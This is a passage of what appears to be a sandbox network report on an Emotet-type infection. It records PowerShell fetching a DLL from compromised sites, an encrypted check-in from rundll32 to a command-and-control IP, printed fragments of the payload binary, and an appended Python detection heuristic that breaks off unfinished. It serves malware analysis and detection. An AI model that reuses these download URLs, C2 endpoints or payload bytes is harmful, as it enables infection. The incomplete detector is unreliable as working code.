Jan 24, 2021 18:03:32.017796993 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.017815113 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017857075 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017888069 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.017894983 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017934084 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017962933 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.017972946 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.018009901 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.018042088 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.018049955 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.018079996 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.018117905 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.020024061 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.319114923 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.319190979 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
Jan 24, 2021 18:03:32.319575071 CET | 49166 | 80 | 192.168.2.22 | 166.62.10.32
Jan 24, 2021 18:03:32.319933891 CET | 49165 | 80 | 192.168.2.22 | 104.21.89.78
Jan 24, 2021 18:04:45.713690996 CET | 49173 | 80 | 192.168.2.22 | 69.38.130.14
Jan 24, 2021 18:04:48.726026058 CET | 49173 | 80 | 192.168.2.22 | 69.38.130.14
Jan 24, 2021 18:04:59.680458069 CET | 49174 | 8080 | 192.168.2.22 | 195.159.28.230
Jan 24, 2021 18:04:59.720827103 CET | 8080 | 49174 | 195.159.28.230 | 192.168.2.22
Jan 24, 2021 18:04:59.720974922 CET | 49174 | 8080 | 192.168.2.22 | 195.159.28.230
Jan 24, 2021 18:04:59.722896099 CET | 49174 | 8080 | 192.168.2.22 | 195.159.28.230
Jan 24, 2021 18:04:59.723037958 CET | 49174 | 8080 | 192.168.2.22 | 195.159.28.230
Jan 24, 2021 18:04:59.763123989 CET | 8080 | 49174 | 195.159.28.230 | 192.168.2.22
Jan 24, 2021 18:04:59.763178110 CET | 8080 | 49174 | 195.159.28.230 | 192.168.2.22
Jan 24, 2021 18:04:59.763246059 CET | 49174 | 8080 | 192.168.2.22 | 195.159.28.230
Jan 24, 2021 18:04:59.763298035 CET | 49174 | 8080 | 192.168.2.22 | 195.159.28.230
Jan 24, 2021 18:04:59.803536892 CET | 8080 | 49174 | 195.159.28.230 | 192.168.2.22
Jan 24, 2021 18:04:59.803580046 CET | 8080 | 49174 | 195.159.28.230 | 192.168.2.22
Jan 24, 2021 18:04:59.803597927 CET | 8080 | 49174 | 195.159.28.230 | 192.168.2.22
Jan 24, 2021 18:04:59.803625107 CET | 8080 | 49174 | 195.159.28.230 | 192.168.2.22
Jan 24, 2021 18:04:59.975095987 CET | 8080 | 49174 | 195.159.28.230 | 192.168.2.22
Jan 24, 2021 18:04:59.975120068 CET | 8080 | 49174 | 195.159.28.230 | 192.168.2.22
Jan 24, 2021 18:04:59.975131035 CET | 8080 | 49174 | 195.159.28.230 | 192.168.2.22
Jan 24, 2021 18:04:59.975193977 CET | 49174 | 8080 | 192.168.2.22 | 195.159.28.230
Jan 24, 2021 18:04:59.975234985 CET | 49174 | 8080 | 192.168.2.22 | 195.159.28.230
Jan 24, 2021 18:05:02.977569103 CET | 8080 | 49174 | 195.159.28.230 | 192.168.2.22
Jan 24, 2021 18:05:02.977790117 CET | 49174 | 8080 | 192.168.2.22 | 195.159.28.230

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 24, 2021 18:03:27.502136946 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jan 24, 2021 18:03:27.539346933 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jan 24, 2021 18:03:27.632148981 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jan 24, 2021 18:03:27.678886890 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jan 24, 2021 18:03:28.180188894 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jan 24, 2021 18:03:28.340291023 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jan 24, 2021 18:03:28.953387022 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jan 24, 2021 18:03:29.245902061 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Jan 24, 2021 18:03:29.843183994 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jan 24, 2021 18:03:29.925537109 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jan 24, 2021 18:03:30.647469044 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Jan 24, 2021 18:03:30.810009003 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jan 24, 2021 18:04:47.949908018 CET | 69.38.130.14 | 192.168.2.22 | 8718 | (Host unreachable) | Destination Unreachable
Jan 24, 2021 18:04:51.799916029 CET | 69.38.130.14 | 192.168.2.22 | 8718 | (Host unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 24, 2021 18:03:27.502136946 CET | 192.168.2.22 | 8.8.8.8 | 0xc52c | Standard query (0) | coworkingplus.es | A (IP address) | IN (0x0001)
Jan 24, 2021 18:03:27.632148981 CET | 192.168.2.22 | 8.8.8.8 | 0x4d68 | Standard query (0) | silkonbusiness.matrixinfotechsolution.com | A (IP address) | IN (0x0001)
Jan 24, 2021 18:03:28.180188894 CET | 192.168.2.22 | 8.8.8.8 | 0x3714 | Standard query (0) | bbjugueteria.com | A (IP address) | IN (0x0001)
Jan 24, 2021 18:03:28.953387022 CET | 192.168.2.22 | 8.8.8.8 | 0xa6ed | Standard query (0) | www.bimception.com | A (IP address) | IN (0x0001)
Jan 24, 2021 18:03:29.843183994 CET | 192.168.2.22 | 8.8.8.8 | 0x758f | Standard query (0) | armakonarms.com | A (IP address) | IN (0x0001)
Jan 24, 2021 18:03:30.647469044 CET | 192.168.2.22 | 8.8.8.8 | 0xf75c | Standard query (0) | alugrama.com.mx | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 24, 2021 18:03:27.539346933 CET | 8.8.8.8 | 192.168.2.22 | 0xc52c | No error (0) | coworkingplus.es | | 104.21.89.78 | A (IP address) | IN (0x0001)
Jan 24, 2021 18:03:27.539346933 CET | 8.8.8.8 | 192.168.2.22 | 0xc52c | No error (0) | coworkingplus.es | | 172.67.138.213 | A (IP address) | IN (0x0001)
Jan 24, 2021 18:03:27.678886890 CET | 8.8.8.8 | 192.168.2.22 | 0x4d68 | No error (0) | silkonbusiness.matrixinfotechsolution.com | | 166.62.10.32 | A (IP address) | IN (0x0001)
Jan 24, 2021 18:03:28.340291023 CET | 8.8.8.8 | 192.168.2.22 | 0x3714 | No error (0) | bbjugueteria.com | | 162.241.60.240 | A (IP address) | IN (0x0001)
Jan 24, 2021 18:03:29.245902061 CET | 8.8.8.8 | 192.168.2.22 | 0xa6ed | No error (0) | www.bimception.com | bimception.com | | CNAME (Canonical name) | IN (0x0001)
Jan 24, 2021 18:03:29.245902061 CET | 8.8.8.8 | 192.168.2.22 | 0xa6ed | No error (0) | bimception.com | | 162.241.224.176 | A (IP address) | IN (0x0001)
Jan 24, 2021 18:03:29.925537109 CET | 8.8.8.8 | 192.168.2.22 | 0x758f | No error (0) | armakonarms.com | | 45.143.97.183 | A (IP address) | IN (0x0001)
Jan 24, 2021 18:03:30.810009003 CET | 8.8.8.8 | 192.168.2.22 | 0xf75c | No error (0) | alugrama.com.mx | | 162.241.61.203 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• coworkingplus.es
• silkonbusiness.matrixinfotechsolution.com
• armakonarms.com
• alugrama.com.mx
• 195.159.28.230
  • 195.159.28.230:8080

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 104.21.89.78 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
Jan 24, 2021 18:03:27.576509953 CET | 0 | OUT | GET /wp-admin/FxmME/ HTTP/1.1
Host: coworkingplus.es
Connection: Keep-Alive
Jan 24, 2021 18:03:27.612721920 CET | 1 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Jan 2021 17:03:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d12959decfc29f1e011ae337be7f9776f1611507807; expires=Tue, 23-Feb-21 17:03:27 GMT; path=/; domain=.coworkingplus.es; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 07d6f2cd6200000614ba13c000000001
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=jqyW769qYKf6%2Fv%2BYWWWZw7E9by13eUCOBGSNW2OacWMojO0Wx075cXGx2oruRhH%2FKxfRl85tvN%2FuOA7KSRIEssJnBBzm3OERG1r%2B44pKy2zr"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 616b53f5680a0614-FRA
Data Ascii: 10d8<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="w
Jan 24, 2021 18:03:27.612776041 CET | 3 | IN | Data Ascii: idth=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styl
Jan 24, 2021 18:03:27.612808943 CET | 4 | IN | Data Ascii: div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustw
Jan 24, 2021 18:03:27.612844944 CET | 5 | IN | Data Ascii: </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span
Jan 24, 2021 18:03:27.612879992 CET | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 166.62.10.32 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
Jan 24, 2021 18:03:27.908679008 CET | 6 | OUT | GET /js/q26/ HTTP/1.1
Host: silkonbusiness.matrixinfotechsolution.com
Connection: Keep-Alive
Jan 24, 2021 18:03:28.149194002 CET | 7 | IN | HTTP/1.1 404 Not Found
Date: Sun, 24 Jan 2021 17:03:28 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49171 | 45.143.97.183 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
Jan 24, 2021 18:03:29.975642920 CET | 10 | OUT | GET /wp-includes/fz/ HTTP/1.1
Host: armakonarms.com
Connection: Keep-Alive
Jan 24, 2021 18:03:30.521126032 CET | 12 | IN | HTTP/1.1 404 Not Found
Connection: Keep-Alive
X-Powered-By: PHP/7.3.22
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://armakonarms.com/wp-json/>; rel="https://api.w.org/"
Transfer-Encoding: chunked
Date: Sun, 24 Jan 2021 17:03:30 GMT
Server: LiteSpeed
Data Ascii: 5867<!DOCTYPE html><html lang="tr"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Sayfa bulunamad &#8211; Armakon Arms</title><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Armakon Arms &raquo; beslemesi" href="https://armakonarms.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Armakon Arms &raquo; yorum beslemesi" href="https://armakonarms.com/comments/feed/" /><script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/armakonarms.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.6"}};!fun
Jan 24, 2021 18:03:30.521193027 CET | 13 | IN | Data Ascii: ction(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.wi
Jan 24, 2021 18:03:30.521224022 CET | 14 | IN | Data Ascii: .supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onl
Jan 24, 2021 18:03:30.521255970 CET | 16 | IN | Data Ascii: le.css?ver=4.0.0' type='text/css' media='all' /><link rel='stylesheet' id='woocommerce-layout-css' href='http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.9.1' type='text/css' media='all' /><link
Jan 24, 2021 18:03:30.521296978 CET | 17 | IN | Data Ascii: olor-background-color{ background-color: #0366d6!important; } .single-post-container .alignfull > [class*="__inner-container"], .single-post-container .alignwide > [class*="__inner-container"]{ max-width:718px } .single-product .alignfull > [c
Jan 24, 2021 18:03:30.521338940 CET | 18 | IN | Data Ascii: alt.single_add_to_cart_button, .woocommerce .actions > button[type=submit], .woocommerce button#place_order, .woocommerce .return-to-shop > .button, .button.woocommerce-form-login__submit,.woocommerce #review_form #respond input#submit, .wooco
Jan 24, 2021 18:03:30.521404982 CET | 20 | IN | Data Ascii: (.more-details):not(.checkout-button):hover, .woocommerce a.button.alt:hover, .woocommerce a.button.button-primary:hover, .woocommerce button.button:disabled:hover, .woocommerce button.button:disabled[disabled]:hover, .woocommerce a.button.add
Jan 24, 2021 18:03:30.521460056 CET | 21 | IN | Data Ascii: le-secondary .wp-block-button__link ,.woocommerce-cart table.cart td.actions .coupon > .input-text + .button, .woocommerce-checkout #neve-checkout-coupon .woocommerce-form-coupon .form-row-last button, .woocommerce button.button:not(.single_ad
Jan 24, 2021 18:03:30.521497965 CET | 23 | IN | Data Ascii: ast button.button:hover{ background-color: rgba(0,0,0,0);color: var(--nv-text-color); } .woocommerce-mini-cart__buttons .button.checkout{ background-color: #0366d6;color: #ffffff;border-radius:3px 3px 3px 3px;border:none;border-width:1px 1px 1
Jan 24, 2021 18:03:30.521548986 CET | 24 | IN | Data Ascii: -sells > h2, #order_review_heading{ letter-spacing: 0px; font-weight: 400; text-transform: none; font-family: Asap Condensed, var(--nv-fallback-ff); } form:not([role="search"]):not(.woocommerce-cart-form):not(.woocommerce-ordering):not(.cart)
Jan 24, 2021 18:03:30.570323944 CET | 25 | IN | Data Ascii: der-main-inner .nav-ul .sub-menu{ background-color: #ffffff; } .hfg_header .header-main-inner{ background-color: #ffffff; } .header-bottom-inner,.header-bottom-inner a:not(.button),.header-bottom-inner .navbar-toggle{ color: var(--nv-text-colo


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49172 | 162.241.61.203 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
Jan 24, 2021 18:03:30.944920063 CET | 55 | OUT | GET /t/2/ HTTP/1.1
Host: alugrama.com.mx
Connection: Keep-Alive
Jan 24, 2021 18:03:31.210002899 CET | 56 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Jan 2021 17:03:31 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Sun, 24 Jan 2021 17:03:31 GMT
Content-Disposition: attachment; filename="eWCV6B.dll"
Content-Transfer-Encoding: binary
Set-Cookie: 600da863225b4=1611507811; expires=Sun, 24-Jan-2021 17:04:31 GMT; Max-Age=60; path=/
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Sun, 24 Jan 2021 17:03:31 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=75
Transfer-Encoding: chunked
Content-Type: application/octet-stream
Data Ascii: 3d08MZ@!L!This program cannot be run in DOS mode.$PELF`!2@PP`d<Xa`.text68 `.rdataWP<@@.data`>@.text4pB@.text8d`0 @.text7dp2 @.text6d4 @.text5d6 @.reloc8@B
                                                                    Data Ascii: E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*
                                                                    Jan 24, 2021 18:03:31.210386038 CET69INData Raw: f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00
                                                                    Data Ascii: *E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*
                                                                    Jan 24, 2021 18:03:31.343626976 CET70INData Raw: c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05
                                                                    Data Ascii: p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p


Session ID:4
Source IP:192.168.2.22
Source Port:49174
Destination IP:195.159.28.230
Destination Port:8080
Process:C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
Jan 24, 2021 18:04:59.722896099 CET | 419 | OUT | POST /qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/ HTTP/1.1
                                                                    DNT: 0
                                                                    Referer: 195.159.28.230/qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/
                                                                    Content-Type: multipart/form-data; boundary=---------------------iENsjsNk0B6FOMTAZLRMt
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Host: 195.159.28.230:8080
                                                                    Content-Length: 5492
                                                                    Connection: Keep-Alive
                                                                    Cache-Control: no-cache
Jan 24, 2021 18:04:59.975095987 CET | 427 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Sun, 24 Jan 2021 17:04:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Vary: Accept-Encoding
                                                                    Data Raw: 38 38 34 0d 0a b5 23 c7 b5 3b 8f d0 b4 b3 08 7d ad 2c be 3e ca 52 3b 98 d7 2a 9a c5 6e 2d 06 0c 85 b2 2e 7d f6 50 22 a1 5d 74 e2 f1 67 8e f3 a7 e4 71 52 21 74 83 e9 1b a7 be 87 37 bb 19 77 21 2b 0f 9d 2e f7 e4 aa 97 55 78 3b bd fd de 55 d5 ad 70 ea 91 0f f9 e5 52 f7 56 0c 4e ac 31 f9 34 63 f0 cf 8a 86 15 ca 1d 8b 05 45 bf ef 0d 27 53 a4 6e 71 43 ab e5 30 24 73 22 16 7c 2e 57 a3 78 47 4a 1e 2d 8f 4e a9 04 04 99 a9 95 2a b3 8f c4 a5 3f df 97 5f ce 58 2e b6 93 ba e7 c5 32 93 b2 47 12 7c 4c f8 ec 25 6f d7 88 0b 7c 68 b6 b5 6a db c2 f0 c0 d4 90 f5 7c 5e 53 df 1d 71 a9 0f 58 d6 57 ee 59 f1 41 d2 13 d1 9f b6 7e 2a 3d 39 b2 9d 43 56 4b 97 4c c8 e7 04 2d 44 84 f8 cd 00 77 d2 7c d2 16 0d 94 87 a4 66 95 5c 4e e7 2a d7 3b 0a f1 b1 a5 a0 f8 74 42 d7 23 bc 2e 71 4a 1d 71 5c 44 a0 71 e1 54 89 8b 29 ec c2 e4 74 16 66 bd dc 89 42 46 32 06 cc 47 7d b8 d4 fa d1 f3 af cb 39 45 fa 94 ef 68 64 6f d0 c1 0a 15 e7 31 63 7d 79 e2 1e 7b cf ce e2 6b 99 03 c2 bb 6a f1 95 d0 9a c6 d6 8b 6b 88 63 70 50 ec 2b 02 4b be c9 29 e0 35 46 cc a1 0d 3d 21 9c b8 4c fd 27 0b 6d d5 cc 56 48 5e 84 aa f7 4f 02 ee eb 90 2a e5 e2 17 2e 45 25 44 74 11 a8 36 54 99 f9 78 8f f7 a4 b7 f3 72 d0 2e 06 15 eb ae e3 f7 21 b1 19 b3 c7 9a 48 2b ac 21 02 58 d0 c8 80 c3 86 d4 0c b1 be a0 56 a8 f8 5f a7 e0 3b e8 ed 00 31 01 fa cd e8 15 13 51 19 06 f7 b3 c4 bf 3c 97 f4 49 ef d0 73 c3 e1 c5 e9 c5 3e a0 c3 ce f8 34 a6 50 38 d1 6d 80 bd 0f d0 af dd 9d 78 f1 43 b3 7e 90 af 48 b0 8a e2 08 60 2d eb 8c e6 98 6f 0f 4e 93 79 a5 1b 43 07 e8 0d 6e 95 b2 f2 c7 cd 81 0a 5a 20 db 50 f9 36 d8 2e 22 7e 0c 62 b3 6f c1 d5 43 ce 79 eb 14 d4 a0 87 e0 8f 30 d4 28 b9 fd ab 34 3d b5 71 7b 7a 38 4a d0 a8 a1 78 8e 8a 40 50 3e 6c 5f ca 71 09 31 a4 0e 55 88 63 83 93 d7 0b 14 f6 1a 96 83 f5 75 10 a9 c3 ad 63 b9 47 f3 86 e4 eb be 0f ad 96 8b d7 38 ff 51 85 49 d4 e5 65 ec 0f 5b 1c d8 f0 fe 75 94 0f df f3 b0 b2 81 6f 8d 8e 2b 00 f7 1e 6b 35 04 37 01 71 b8 04 c6 5d 05 45 b3 09 3d 
b3 c5 40 d3 17 03 17 5a 9f 4d 9b 4e e2 c1 09 86 ac e9 65 3d fa 97 8a dd 65 db 88 a8 5e 84 9e bd ee 34 10 6a a2 b8 b6 dc 9f 37 4c f0 ea b3 a1 b6 03 99 8d 36 13 e0 58 8e 53 0b 2d e5 64 f0 6e 82 f2 77 66 50 eb d3 6e ea 46 7d 15 54 56 f0 ef df da 3e 20 a3 71 ca 88 13 12 f3 03 3c fc 85 84 d0 0f d0 1f d5 cf 8e e9 dd 30 dc ef 8b 43 d1 10 04 64 64 78 00 1a 41 d5 12 98 5c 46 23 8f 25 04 ac 46 ab 24 51 cf 24 2f e9 78 c4 71 59 1c 42 dc 8c 83 65 b1 21 1f 9e 2a 05 4f a0 f4 19 a0 ac b0 c1 65 10 0a 88 c8 5c 42 5b 67 af d7 0a 11 ee 27 26 e6 09 d1 87 34 36 44 98 a5 51 dc 75 1d bd 4e a1 d0 7d fd 69 fa a2 b7 7c cb 41 90 4c 54 42 05 0c a7 2d 63 a8 76 fc 13 80 42 ef 48 39 87 b6 9f 3a 1f 24 92 24 33 33 81 22 ce ca 73 ee d3 b7 50 92 bf 13 ad 8d 82 63 e5 14 1a ef 14 a2 a3 66 64 e4 c7 b2 a9 2d 41 4a f8 bb 37 ab 9f 8b b7 99 ea 29 84 0c f6 e4 f2 25 84 44 5b 79 6c 4a 10 4a 30 ad cf 04 ce 2b 06 2a dd 8d 28 65 19 27 c6 f8 a5 0e 39 a2 43 30 71 86 af 0b 7d b4 d8 37 6c cc 23 32 ae 03 8c 4c 90 1f 2e 65 ea 41 d1 a7 e2 98 cc 83 44 24 c5 84 63 fa f2 c7 a8 d4 16 4c b2 81 80 5a 43 95 4c a6 9c b2 fc e3 8f 27 0f 39 72 5c 72 38 9e a9 04 02 2c 8b 1a cd 21 18 4c 13 dd c9 93 7d aa 3b 63 cf 6e 0a 18 91 9c cc 4a 27 b6 f4 51 5d fb 23 97 c5 fa cb b9 d8 a3 12 94 8e bc cf 8a 3c 1f a1 a7 57 8b e9 eb 0e e6 14 35 18 1b 04 39 31 77 30 11 ce 35 64 26 2a da 54 20 29 7b b0 d3 dd c1 fd 0f 5e 07 86 f4 14 49 b3 24 ae a2 b5 f9 d1 58 e6 bb 29 8a 0b fb 9f 88 d3 84 e1 4f 99 0b 76 3a 83 60 a8 20 e9 6b 87 2f 1a c2 3e cc a8 1e ab 12 5e 15 7f 5b 15 99 c8 95 a2 5f 35 e3 6a ce f8
                                                                    Data Ascii: 884#;},>R;*n-.}P"]tgqR!t7w!+.Ux;UpRVN14cE'SnqC0$s"|.WxGJ-N*?_X.2G|L%o|hj|^SqXWYA~*=9CVKL-Dw|f\N*;tB#.qJq\DqT)tfBF2G}9Ehdo1c}y{kjkcpP+K)5F=!L'mVH^O*.E%Dt6Txr.!H+!XV_;1Q<Is>4P8mxC~H`-oNyCnZ P6."~boCy0(4=q{z8Jx@P>l_q1UcucG8QIe[uo+k57q]E=@ZMNe=e^4j7L6XS-dnwfPnF}TV> q<0CddxA\F#%F$Q$/xqYBe!*Oe\B[g'&46DQuN}i|ALTB-cvBH9:$$33"sPcfd-AJ7)%D[ylJJ0+*(e'9C0q}7l#2L.eAD$cLZCL'9r\r8,!L};cnJ'Q]#<W591w05d&*T ){^I$X)Ov:` k/>^[_5j
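The exchange above is the loader's first check-in: rundll32.exe POSTs a multipart/form-data body straight to an IP literal on port 8080, the Referer repeats host and path without a scheme, every path segment looks generated, and the nginx 200 that comes back carries a chunked body that is not readable text. None of these fields is rare on its own, which is why a proxy-log rule should score several of them together rather than alert on any one. The Python below is an added example, not part of the report or of the sandbox: it parses a raw request head and scores it on exactly those traits. The Emotet request is copied from the capture above; the two benign requests are constructed to show where the threshold sits.

```python
import ipaddress
import re


def parse_request(raw):
    """Split a raw HTTP/1.x request head into (method, path, headers); header names lowercased."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def split_host_port(host):
    """'1.2.3.4:8080' -> ('1.2.3.4', 8080); bracketed IPv6 literals are not handled here."""
    h, sep, p = host.rpartition(":")
    if sep and p.isdigit():
        return h, int(p)
    return host, None


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


RANDOM_SEGMENT = re.compile(r"[a-z0-9]{6,}")


def looks_generated(segment):
    # Heuristic: lowercase alphanumeric, six or more characters, mixing letters and digits.
    return (bool(RANDOM_SEGMENT.fullmatch(segment))
            and any(c.isdigit() for c in segment)
            and any(c.isalpha() for c in segment))


def assess(raw, threshold=3):
    """Return (flagged, reasons). Each trait is weak alone; 'threshold' of them together is the alert."""
    method, path, headers = parse_request(raw)
    reasons = []
    host, port = split_host_port(headers.get("host", ""))
    ctype = headers.get("content-type", "").lower()
    if method == "POST" and ctype.startswith("multipart/form-data"):
        reasons.append("POST multipart/form-data")
    if is_ip_literal(host):
        reasons.append("Host is a bare IP address")
    if port not in (None, 80, 443):
        reasons.append(f"non-standard destination port {port}")
    ref = headers.get("referer")
    if ref and not re.match(r"https?://", ref, re.IGNORECASE):
        reasons.append("Referer carries no scheme")
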